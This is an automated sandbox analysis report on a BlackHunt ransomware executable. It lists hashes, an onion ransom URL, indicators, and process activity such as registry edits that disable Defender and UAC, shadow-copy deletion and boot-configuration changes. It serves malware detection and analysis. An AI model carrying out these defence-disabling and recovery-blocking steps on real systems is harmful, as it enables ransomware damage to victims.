Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
177s -
max time network
203s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 01:32
Static task
static1
Behavioral task
behavioral1
Sample
fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe
Resource
win10v2004-20231215-en
General
-
Target
fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe
-
Size
707KB
-
MD5
e0df8b1939f62f03b8e8847de9208484
-
SHA1
3b5234bd5980cc547f1ce9dc485da187b2480a0e
-
SHA256
fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8
-
SHA512
a550f86c9b4d562a5373ebd451e17c96a31103ea0822dd0f0f4318e4fa35d12a388c2146d8e33ea027489e6ed51575e46fc3c92ac2818d68afd658173ed35076
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1+8fvnh:6uaTmkZJ+naie5OTamgEoKxLWV3h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 6004 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 6012 bcdedit.exe 5920 bcdedit.exe -
Renames multiple (536) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5944 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" Process not Found -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\J: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\I: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\S: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\L: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\W: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\T: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\P: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\A: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\N: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\E: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\R: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\Y: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\U: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\X: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\M: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\Z: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\V: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\B: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\Q: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\O: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\H: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened (read-only) \??\K: fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk-1.8\include\#BlackHunt_ReadMe.hta fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\jdk\#BlackHunt_ReadMe.hta fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\relaxngdatatype.md fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\xmlresolver.md fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jre-1.8\bin\dtplugin\#BlackHunt_ReadMe.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\7-Zip\Lang\is.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk-1.8\legal\javafx\#BlackHunt_ReadMe.hta fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\blacklist fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmti.h fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jni.h fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\#BlackHunt_ReadMe.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\VideoLAN\VLC\locale\an\#BlackHunt_ReadMe.hta fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\7-Zip\Lang\af.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited\US_export_policy.jar fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\MeasureSuspend.pptm fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#BlackHunt_ReadMe.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\7-Zip\7zCon.sfx fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\splash.gif fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaBrightItalic.ttf fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jopt-simple.md fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\7-Zip\Lang\pt.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\jpeg_fx.md fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jce.jar fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\#BlackHunt_Private.key fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\7-Zip\Lang\hi.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\joni.md fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr\profile.jfc fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_zh_CN.properties fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\limited\#BlackHunt_Private.key fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.hta fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\7-Zip\Lang\ba.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\#BlackHunt_Private.key fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_LinkNoDrop32x32.gif fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk-1.8\include\win32\bridge\#BlackHunt_ReadMe.hta fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\icu_web.md fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xmlresolver.md fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\#BlackHunt_ReadMe.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\VideoLAN\VLC\locale\da\#BlackHunt_ReadMe.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\dotnet\host\fxr\#BlackHunt_ReadMe.hta fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\#BlackHunt_Private.key fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited\US_export_policy.jar fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\libffi.md fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\relaxngdatatype.md fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\directshow.md fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jdk-1.8\legal\#BlackHunt_ReadMe.hta fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jre-1.8\legal\javafx\#BlackHunt_ReadMe.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\cryptix.md fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jre-1.8\lib\amd64\#BlackHunt_ReadMe.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited\#BlackHunt_Private.key fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\SetEnable.jpg fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\#BlackHunt_ReadMe.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\#BlackHunt_ReadMe.hta fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\Java\jre-1.8\lib\images\cursors\#BlackHunt_Private.key fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\meta-index fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\thaidict.md fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#BlackHunt_Private.key fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5404 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5828 vssadmin.exe 5628 vssadmin.exe 5264 vssadmin.exe 5732 vssadmin.exe 5864 vssadmin.exe -
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe Token: SeRestorePrivilege 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe Token: SeBackupPrivilege 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe Token: SeTakeOwnershipPrivilege 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe Token: SeAuditPrivilege 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe Token: SeSecurityPrivilege 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe Token: SeIncBasePriorityPrivilege 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe Token: SeBackupPrivilege 4956 wbengine.exe Token: SeRestorePrivilege 4956 wbengine.exe Token: SeSecurityPrivilege 4956 wbengine.exe Token: SeBackupPrivilege 4936 vssvc.exe Token: SeRestorePrivilege 4936 vssvc.exe Token: SeAuditPrivilege 4936 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1432 wrote to memory of 3976 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 90 PID 1432 wrote to memory of 3976 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 90 PID 1432 wrote to memory of 1072 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 92 PID 1432 wrote to memory of 1072 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 92 PID 1432 wrote to memory of 3260 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 94 PID 1432 wrote to memory of 3260 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 94 PID 1432 wrote to memory of 2260 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 96 PID 1432 wrote to memory of 2260 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 96 PID 1432 wrote to memory of 4704 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 98 PID 1432 wrote to memory of 4704 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 98 PID 3976 wrote to memory of 4532 3976 cmd.exe 100 PID 3976 wrote to memory of 4532 3976 cmd.exe 100 PID 4704 wrote to memory of 2452 4704 cmd.exe 104 PID 4704 wrote to memory of 2452 4704 cmd.exe 104 PID 1072 wrote to memory of 4384 1072 cmd.exe 103 PID 1072 wrote to memory of 4384 1072 cmd.exe 103 PID 2260 wrote to memory of 1728 2260 cmd.exe 102 PID 2260 wrote to memory of 1728 2260 cmd.exe 102 PID 3260 wrote to memory of 3556 3260 cmd.exe 101 PID 3260 wrote to memory of 3556 3260 cmd.exe 101 PID 1432 wrote to memory of 1064 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 106 PID 1432 wrote to memory of 1064 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 106 PID 1432 wrote to memory of 3804 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 107 PID 1432 wrote to memory of 3804 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 107 PID 1432 wrote to memory of 3480 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 114 PID 1432 wrote to memory of 3480 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 114 PID 1432 wrote to memory of 4476 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 109 PID 1432 wrote to memory of 4476 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 109 PID 1432 wrote to memory of 1864 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 110 PID 1432 wrote to memory of 1864 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 110 PID 1432 wrote to memory of 1764 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 115 PID 1432 wrote to memory of 1764 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 115 PID 1432 wrote to memory of 4484 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 117 PID 1432 wrote to memory of 4484 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 117 PID 1432 wrote to memory of 2588 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 119 PID 1432 wrote to memory of 2588 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 119 PID 1432 wrote to memory of 2204 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 120 PID 1432 wrote to memory of 2204 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 120 PID 1432 wrote to memory of 1348 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 121 PID 1432 wrote to memory of 1348 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 121 PID 1432 wrote to memory of 3760 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 127 PID 1432 wrote to memory of 3760 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 127 PID 1432 wrote to memory of 3952 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 125 PID 1432 wrote to memory of 3952 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 125 PID 1432 wrote to memory of 4448 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 136 PID 1432 wrote to memory of 4448 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 136 PID 1432 wrote to memory of 3224 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 135 PID 1432 wrote to memory of 3224 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 135 PID 1432 wrote to memory of 4988 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 133 PID 1432 wrote to memory of 4988 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 133 PID 1064 wrote to memory of 2792 1064 cmd.exe 131 PID 1064 wrote to memory of 2792 1064 cmd.exe 131 PID 1432 wrote to memory of 4516 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 137 PID 1432 wrote to memory of 4516 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 137 PID 1432 wrote to memory of 5104 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 142 PID 1432 wrote to memory of 5104 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 142 PID 1432 wrote to memory of 3312 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 140 PID 1432 wrote to memory of 3312 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 140 PID 1432 wrote to memory of 1820 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 139 PID 1432 wrote to memory of 1820 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 139 PID 1432 wrote to memory of 456 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 145 PID 1432 wrote to memory of 456 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 145 PID 1432 wrote to memory of 1896 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 146 PID 1432 wrote to memory of 1896 1432 fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe 146 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe"C:\Users\Admin\AppData\Local\Temp\fdc359307eca0c09bd2bae051fb0a16d961c15226ce10bcc1fc9835162592ef8.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1432 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:4532
-
-
-
